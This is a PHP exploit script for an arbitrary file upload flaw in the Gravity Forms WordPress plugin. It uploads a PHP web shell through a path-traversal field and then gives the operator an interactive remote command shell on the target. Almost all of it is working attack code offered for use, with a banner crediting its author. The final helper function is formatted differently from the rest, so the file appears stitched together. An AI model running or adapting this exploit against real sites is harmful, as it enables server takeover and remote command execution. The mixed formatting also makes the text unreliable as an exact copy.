- <?php
- /****************************************************************************************************************************
- *
- * Exploit Title : Gravity Forms [WP] - Arbitrary File Upload
- * Vulnerable Version(s): 1.8.19 (and below)
- * Write-Up : https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html
- * Coded by : Abk Khan [ an0nguy @ protonmail.ch ]
- *
- *****************************************************************************************************************************/
- error_reporting(0);
- echo "
- _____ _ _ ______ _ _
- / ____| (_) | | ____| | | |
- | | __ _ __ __ ___ ___| |_ _ _| |__ __ _| | |___
- | | |_ | '__/ _` \ \ / / | __| | | | __/ _` | | / __|
- | |__| | | | (_| |\ V /| | |_| |_| | | | (_| | | \__ \
- \_____|_| \__,_| \_/ |_|\__|\__, |_| \__,_|_|_|___/
- __/ |
- |___/ > an Exploiter by AnonGuy\n";
- $domain = (@$argv[1] == '' ? 'http://localhost/wordpress' : @$argv[1]);
- $url = "$domain/?gf_page=upload";
- $shell = "$domain/wp-content/_input_3_khan.php5";
- $separator = '-------------------------------------------------------------------';
- $ch = curl_init($url);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, '<?=system($_GET[0]);?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- $response = curl_exec($ch);
- curl_close($ch);
- if (strpos($response, '"ok"') !== false) {
- echo "$separator\nShell at $shell\n$separator\nSpawning a 'No-Session' Shell . . . Done!\n$separator\n";
- while ($testCom != 'exit') {
- $user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
- $b0x = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20hostname;%20echo%20'~'"), '~', '~'));
- echo "$user@$b0x:~$ ";
- $handle = fopen("php://stdin", 'r');
- $testCom = trim(fgets($handle));
- fclose($handle);
- $comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
- echo $comOut;
- }
- }
- else {
- die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
- }
/**
 * Return the substring found between the first occurrence of $start and the
 * first occurrence of $end after it.
 *
 * The haystack is prefixed with a single space so that a genuine match can
 * never sit at offset 0; the loose `== 0` test below therefore only fires when
 * strpos() returns false (i.e. $start is absent), in which case '' is returned.
 *
 * Note: if $end is not present, strpos() yields false, the computed length
 * becomes negative, and substr() returns a tail-trimmed slice instead of
 * failing; callers that need a strict "not found" signal should check for $end
 * themselves.
 *
 * @param string $string haystack to search
 * @param string $start  opening delimiter
 * @param string $end    closing delimiter
 * @return string text between the delimiters, or '' when $start is not found
 */
function get_string_between($string, $start, $end)
{
    // Original credit: adapted from a StackOverflow answer.
    $haystack = ' ' . $string;
    $from = strpos($haystack, $start);

    // false == 0 under loose comparison, so this covers "not found".
    if ($from == 0) {
        return '';
    }

    // Skip past the opening delimiter itself.
    $from += strlen($start);
    $length = strpos($haystack, $end, $from) - $from;

    return substr($haystack, $from, $length);
}
- ?>